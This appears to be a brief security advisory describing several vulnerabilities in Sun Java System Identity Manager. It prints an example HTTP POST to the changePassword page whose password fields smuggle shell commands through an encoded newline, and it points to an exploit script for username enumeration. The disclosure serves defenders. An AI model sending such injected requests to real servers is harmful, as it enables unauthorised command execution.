Sun Java System Identity Manager Multiple Vulnerabilities

Sun Java System Identity Manager Multiple Vulnerabilities

For some issues, an attacker may use a browser or entice an unsuspecting user into following a malicious URI.

The following example request is available for the command-injection issue:

POST /idm/user/changePassword.jsp?lang=en&cntry=US HTTP/1.1
id=***&command=Save&activeControl=&resourceAccounts.selectAll=true&
resourceAccounts.password=id>/x%0aid>/x&resourceAccounts.confirmPassword=id>/x%0aid>/x

The following example is available to trigger the username-enumeration issue:

/data/vulnerabilities/exploits/33489.pl